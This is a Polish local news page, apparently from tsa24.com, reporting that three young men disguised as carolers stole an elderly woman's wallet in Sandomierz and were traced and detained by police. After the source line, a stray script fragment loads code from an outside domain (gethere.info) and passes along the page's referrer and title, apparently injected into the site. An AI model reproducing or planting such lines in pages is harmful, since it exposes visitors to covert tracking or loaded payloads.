Kronika Policyjna

Kolędy śpiewali i … portfel zabrali

Kolędy śpiewali i … portfel zabrali

Policjanci z Komendy Powiatowej Policji w Sandomierzu zatrzymali trzech mężczyzn, którzy w przebraniu kolędników odwiedzali mieszkańców miasta. W jednym z domów wykorzystując nieuwagę 74-letniej kobiety dokonali kradzieży portfela. Policjanci sprawdzają czy kolędnicy nie mają na sumieniu jeszcze innych kradzieży.

W środę wieczorem oficer dyżurny sandomierskiej komendy otrzymał zgłoszenie o kradzieży portfela z domu jednej z mieszkanek Sandomierza. 46-letnia kobieta relacjonując całe zdarzenie poinformowała, że podczas jej chwilowej nieobecności trzech mężczyzn przebranych za kolędników zapukało do drzwi jej domu, w którym przebywała jej 74-letnia matka. Po złożeniu świątecznych życzeń ,,artyści’’ otrzymali od kobiety symboliczne 5 złotych i powędrowali dalej. Zgłaszająca po powrocie dowiedziała się o świątecznych odwiedzinach i zauważyła, że z torebki znajdującej się w pomieszczeniu gdzie gościli kolędnicy zniknął portfel z dokumentami, kartą płatniczą i pieniędzmi w kwocie 45 zł. Jak się później okazało przebierańcy po opuszczeniu mieszkania usiłowali także dokonać wypłaty pieniędzy w bankomacie za pomocą karty płatniczej, znajdującej się w skradzionym portfelu. Jednak gotówki nie uzyskali z uwagi na brak środków na koncie.

Policjanci z Wydziału Kryminalnego rozpoczęli przeglądanie wszelkich możliwych zapisów z monitoringów miejskich, zakładowych oraz prywatnych szukając jakiegokolwiek śladu pozostawionego przez sprawców. Udali się również w rejon bankomatu z którego, sprawcy podejmowali próbę wypłaty pieniędzy. Szybka reakcja, skrupulatna praca i informacje zebrane przez funkcjonariuszy, doprowadziły ich do sąsiedniej miejscowości, a dokładnie do miejsca zamieszkania jednego z przebierańców, którym okazał się 16-latek przebrany w chwili kolędowania za króla. Następnie policjanci zatrzymali dwóch pozostałych kolędników.

W konsekwencji stróże prawa zatrzymali trzech sprawców, odzyskali portfel z dokumentami jednak pieniądze ,,fałszywi kolędnicy’’ wydali tuż po zakończonych występach. Zatrzymani mieszkańcy Podkarpacia w wieku od 16, 18 i 21 lat za swoje nieprzemyślane zachowanie odpowiedzą teraz przed Sądem.

Kolędnicy są miłym dodatkiem do świąt, policjanci przypominają jednak o zachowaniu szczególnej ostrożności w przypadku wizyty obcych osób w mieszkaniu, niezależnie czy będzie to inkasent, kolędnik, czy też osoba podająca się za pracownika innej instytucji.

źródło: KWP Kielce

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + '&default_keyword=’ + encodeURIComponent(document.title) + ”;

Zobacz Komentarze (1)

1 Komentarz

Zostaw komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Kronika Policyjna

Więcej w Kronika Policyjna

Bezpieczeństwo podczas nadchodzącego weekendu

tsa24.com29 października 2021

Szarpanie za mundur i obelgi nie pomogły

tsa24.com29 października 2021

Wszystkich Świętych – Zmiana organizacji ruchu

tsa24.com29 października 2021

Z wizytą u najmłodszych

tsa24.com22 października 2021

Złodzieje pracują też na cmentarzu. Zachowaj czujność !

tsa24.com19 października 2021

Za kierownicą z promilami

tsa24.com18 października 2021

Oszukana 28-latka, straciła sporo pieniędzy

tsa24.com8 października 2021

Przedszkolaki z wizytą w Komendzie Policji w Sandomierzu

tsa24.com8 października 2021

Odzyskali skradzioną ciężarówkę

tsa24.com27 września 2021